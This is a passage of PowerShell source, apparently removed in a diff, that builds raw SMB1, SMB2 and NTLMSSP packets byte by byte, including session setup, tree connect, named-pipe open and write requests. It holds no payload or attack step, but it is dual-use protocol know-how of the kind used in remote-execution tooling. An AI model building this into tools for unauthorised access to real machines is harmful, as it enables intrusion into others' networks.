- $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00))
- $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length))
-
- return $packet_NetBIOSSessionService
- }
-
- #SMB1
-
- function Get-PacketSMBHeader()
- {
- param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
-
- $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
- $packet_SMBHeader.Add("SMBHeader_Command",$packet_command)
- $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00))
- $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00))
- $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags)
- $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2)
- $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID)
- $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID)
- $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID)
- $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00))
-
- return $packet_SMBHeader
- }
-
- function Get-PacketSMBNegotiateProtocolRequest()
- {
- param([String]$packet_version)
-
- if($packet_version -eq 'SMB1')
- {
- [Byte[]]$packet_byte_count = 0x0c,0x00
- }
- else
- {
- [Byte[]]$packet_byte_count = 0x22,0x00
- }
-
- $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count)
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
-
- if($packet_version -ne 'SMB1')
- {
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
- }
-
- return $packet_SMBNegotiateProtocolRequest
- }
-
- function Get-PacketSMBSessionSetupAndXRequest()
- {
- param([Byte[]]$packet_security_blob)
-
- [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
- $packet_byte_count = $packet_byte_count[0,1]
- [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
- $packet_security_blob_length = $packet_security_blob_length[0,1]
-
- $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00))
-
- return $packet_SMBSessionSetupAndXRequest
- }
-
- function Get-PacketSMBTreeConnectAndXRequest()
- {
- param([Byte[]]$packet_path)
-
- [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
- $packet_path_length = $packet_path_length[0,1]
-
- $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length)
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path)
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
-
- return $packet_SMBTreeConnectAndXRequest
- }
-
- function Get-PacketSMBNTCreateAndXRequest()
- {
- param([Byte[]]$packet_named_pipe)
-
- [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
- $packet_named_pipe_length = $packet_named_pipe_length[0,1]
- [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
- $packet_file_name_length = $packet_file_name_length[0,1]
-
- $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length)
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length)
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe)
-
- return $packet_SMBNTCreateAndXRequest
- }
-
- function Get-PacketSMBReadAndXRequest()
- {
- $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBReadAndXRequest
- }
-
- function Get-PacketSMBWriteAndXRequest()
- {
- param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
- $packet_write_length = $packet_write_length[0,1]
-
- $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",$packet_file_ID)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",$packet_write_length)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length)
-
- return $packet_SMBWriteAndXRequest
- }
-
- function Get-PacketSMBCloseRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03))
- $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID)
- $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBCloseRequest
- }
-
- function Get-PacketSMBTreeDisconnectRequest()
- {
- $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00))
- $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBTreeDisconnectRequest
- }
-
- function Get-PacketSMBLogoffAndXRequest()
- {
- $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBLogoffAndXRequest
- }
-
- #SMB2
-
- function Get-PacketSMB2Header()
- {
- param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
-
- [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
-
- $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
- $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00))
- $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00))
- $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Command",$packet_command)
- $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID)
- $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID)
- $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- return $packet_SMB2Header
- }
-
- function Get-PacketSMB2NegotiateProtocolRequest()
- {
- $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02))
-
- return $packet_SMB2NegotiateProtocolRequest
- }
-
- function Get-PacketSMB2SessionSetupRequest()
- {
- param([Byte[]]$packet_security_blob)
-
- [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
- $packet_security_blob_length = $packet_security_blob_length[0,1]
-
- $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length)
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob)
-
- return $packet_SMB2SessionSetupRequest
- }
-
- function Get-PacketSMB2TreeConnectRequest()
- {
- param([Byte[]]$packet_path)
-
- [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
- $packet_path_length = $packet_path_length[0,1]
-
- $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length)
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path)
-
- return $packet_SMB2TreeConnectRequest
- }
-
- function Get-PacketSMB2CreateRequestFile()
- {
- param([Byte[]]$packet_named_pipe)
-
- $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
- $packet_named_pipe_length = $packet_named_pipe_length[0,1]
-
- $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length)
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe)
-
- return $packet_SMB2CreateRequestFile
- }
-
- function Get-PacketSMB2ReadRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID)
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30))
-
- return $packet_SMB2ReadRequest
- }
-
- function Get-PacketSMB2WriteRequest()
- {
- param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
-
- $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length)
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID)
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00))
-
- return $packet_SMB2WriteRequest
- }
-
- function Get-PacketSMB2CloseRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID)
-
- return $packet_SMB2CloseRequest
- }
-
- function Get-PacketSMB2TreeDisconnectRequest()
- {
- $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00))
- $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00))
-
- return $packet_SMB2TreeDisconnectRequest
- }
-
- function Get-PacketSMB2SessionLogoffRequest()
- {
- $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00))
- $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00))
-
- return $packet_SMB2SessionLogoffRequest
- }
-
- #NTLM
-
- function Get-PacketNTLMSSPNegotiate()
- {
- param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
-
- [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
- $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
- [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
- [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
- [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
- [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
-
- $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2)
